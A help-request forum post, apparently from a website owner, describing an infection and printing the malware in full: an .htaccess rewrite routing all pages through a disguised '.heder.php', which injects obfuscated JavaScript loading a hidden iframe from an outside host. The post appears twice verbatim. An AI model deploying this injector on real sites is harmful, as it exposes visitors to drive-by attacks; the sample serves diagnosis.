We have recently attacked by a malware and this is what it do.
it altered the htacess file and placing the following code:
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
then it writes a php file named: .heder.php to mimic the name header.php so that it would not be easily noticed at first glance.
heder.php has the following code:
<?php
$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}
function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['qq'];
chdir(get_file_dir_($file));
include($file);
?>
what it does is the what ever page request your visitor makes, it injects the following codes just after the <body> tag:
<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->
We are tracking down the source of this problem but we are having difficulty finding it.
We change passwords every now and then but it simply comes back.
Does anyone encountered the same problem or have some ideas to prevent this?
it altered the htacess file and placing the following code:
#mmmmd
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} GET
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} !.heder.php
RewriteRule (.*)\.(php|html|htm|php3|phtml|shtml) \.heder.php?%{QUERY_STRING}&qq=$1.$2 [NC,L]
</IfModule>
then it writes a php file named: .heder.php to mimic the name header.php so that it would not be easily noticed at first glance.
heder.php has the following code:
<?php
$frame_code = '<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->';
function get_file_dir_($file) {
global $argv;
$dir = dirname(getcwd() . '/' . $file);
$curDir = getcwd();
chdir($dir);
$dir = getcwd();
chdir($curDir);
return $dir;
}
function callback($data)
{
global $frame_code;
if(preg_match("/(<.*?body.*?>)/i", $data) > 0)
return preg_replace("/(<.*?body.*?>)/i", "\\1 ".$frame_code, $data, 1);
else return $data.$frame_code;
}
ob_start('callback');
$file = $_GET['qq'];
chdir(get_file_dir_($file));
include($file);
?>
what it does is the what ever page request your visitor makes, it injects the following codes just after the <body> tag:
<!--pCQegcQpSdDlcHjr--><script>/*kKMIkqZKzudmzolxbrOHcWc*/var YtJzBU=document;/*IiTSklCVzskOGQGJRjfotls*/function UvrUmwYA(fXCunYmB)/*oMvBLMFdAhNBEswhcTQORaUK*/{var DdKQrsBtb = "",/*qMhJXHFXbplaeBhn*/MAueQJPqK=0;for(MAueQJPqK=fXCunYmB.length-1;MAueQJPqK >= 0;MAueQJPqK--)/*_QFpgDWzoZ_IUa_EYAAsBSz*/{DdKQrsBtb+=fXCunYmB.charAt(MAueQJPqK);}return DdKQrsBtb;/*MObrkBcjKvUUEMQ*/}/*uTerrZNumvQKTuJLpL*/function lAzxGtC(XFRZIMF_)/*kKMIkqZKzudmzolxbrOHcWc*/{/*qMhJXHFXbplaeBhn*/XFRZIMF_ = XFRZIMF_.replace(/[\.]/g, "%");/*DQloCfcNIAbcedryffCLqfJb*/XFRZIMF_=unescape(XFRZIMF_);/*dYwdhKVcIC*/return UvrUmwYA(XFRZIMF_);/*labNWxLCjH_vHfgqHzTeFJpk*/}/*mDxpBbGaaSRIv*/function gqDmBRQ(){/*qMhJXHFXbplaeBhn*/YtJzBU.write("<style>.JIjzCtPmog{width:1px;height:1px;border:none;visibility:hidden}</style>");/*_QFpgDWzoZ_IUa_EYAAsBSz*//*_QFpgDWzoZ_IUa_EYAAsBSz*/var rPnbv="<iframe id=\"fWMiliU\" src=\"x\" class=\"JIjzCtPmog\"></iframe>";/*MObrkBcjKvUUEMQ*//*XveYPeKLuEKekySlz*/var eukscm=rPnbv.replace(/[\+x]/g,lAzxGtC(".70.68.70.2e.6e.69.2f.73.74.61.74.73.2f.6f.66.6e.69.2e.72.65.74.6e.75.6f.63.2d.65.76.69.6c.2e.77.77.77.2f.2f.3a.70.74.74.68"));/*qMhJXHFXbplaeBhn*//*EDoaNtIMGMc*/return eukscm;/*rqszXRaWBkPDChdYQJhZ*//*ZanD_dBPp_pbECRk*/}/*EDoaNtIMGMc*//*IiTSklCVzskOGQGJRjfotls*//*ZanD_dBPp_pbECRk*//*VAggMvx_ioGGV*/YtJzBU.writeln(gqDmBRQ());/*PPOfbNdeQEktSYITseyRSquT*//*mDxpBbGaaSRIv*//*eUChBuePLDO*/</script><!--pCQegcQpSdDlcHjr-->
We are tracking down the source of this problem but we are having difficulty finding it.
We change passwords every now and then but it simply comes back.
Does anyone encountered the same problem or have some ideas to prevent this?